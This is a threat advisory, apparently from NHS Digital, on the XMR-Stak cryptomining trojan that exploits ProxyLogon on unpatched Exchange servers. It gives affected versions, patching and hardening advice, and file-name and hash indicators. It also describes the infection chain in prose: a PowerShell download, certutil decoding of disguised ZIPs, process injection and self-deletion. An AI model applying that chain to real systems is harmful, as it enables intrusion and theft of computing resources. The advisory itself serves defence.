XMR-Stak Cryptocurrency Miner

First seen in early March 2021, XMR-Stak is a cryptomining trojan targeting vulnerable Exchange Server systems with a ProxyLogon exploit. Compromised systems are used to both mine new currency and as payload hosting servers for new infections.

Threat ID:: CC-3827
Category:: Miner, Cryptocurrency
Threat Severity:: Medium
Threat Vector:: Exploit
Published:: 21 April 2021 11:42 AM

Report a cyber attack: call 0300 303 5222 or email [email protected]

Summary

Affected platforms

The following platforms are known to be affected:

Versions: 2019 prior to CU8 (15.2.792.10) or CU7 (15.2.721.13), 2016 prior to CU19 (15.1.2176.9) or CU18 (15.1.2106.13), 2013 prior to CU23 (15.0.1497.12), and 2010 prior to SP3 RU32 (14.3.513.0)

Microsoft Exchange Server

Threat details

Introduction

XMR-Stak is a newly observed cryptocurrency mining malware affecting unpatched Microsoft Exchange Server systems. The group operating it are using known ProxyLogon exploits to gain access to target systems.

Delivery & activities

Vulnerable servers are initially accessed using a PowerShell command to download a ZIP archive file from a previously compromised server's Outlook Web Access path. This file is not a legitimate archive but is instead a batch script, which when executed invokes certutil.exe to download and decode two additional spoofed ZIP archives.

The first of these files is another batch script which will decode second file, which contains the miner and it's configuration data, before injecting it into a running process. If successful, the script then deletes both itself and the other ZIP archives, leaving only the running mining process.

XMR-Stak configuration data states that it will only begin mining if it can create a TLS connection to the attacker's Monero wallet. Despite fund beginning to appear in this wallet in early March, mining activity remained low until April when it began to increase steadily, suggesting XMR-Stak's operators were ramping up their operations.

Remediation advice

Organisations are encouraged to review Microsoft's March 2021 Exchange Server Security Updates page and apply any relevant updates to address the ProxyLogon vulnerabilities used exploited by XMR-Stak.

Additionally, to prevent and detect an infection, NHS Digital advises that:

Secure configurations are applied to all devices.
Security updates are applied at the earliest opportunity.
Tamper protection settings in security products are enabled where available.
Obsolete platforms are segregated from the rest of the network.
IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
Administrative accounts are only used for necessary purposes.
Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.

Indicators of compromise

Host indicators

Filenames

run.bat
QuickCPU.dat
QuickeCPU.exe
win_d.zip
win_r.zip
win_s.zip

SHA256 hashes

3ad9da14e7f7e68e31d6cb6a8cab13e1eb45cb147371edbf0e4ed3e5262b9f51
3dabd3bf16f5856d504d0ae20d3d3c9c6c74ccee562964292bb4565dda91a0e8
4324ba1ca3a4db940dee5de14644e31268df081047b2681b8e33a1f3da7bae9a
54a37cc18dae575965f73cc260cedf5b2d4e356ab53070cc3577c6d0bf125211
6539bbb8cbf33b050d544283f51ccc52ec040b62e3c706d20bd0fe4e221212e3

Last edited: 22 April 2021 3:13 pm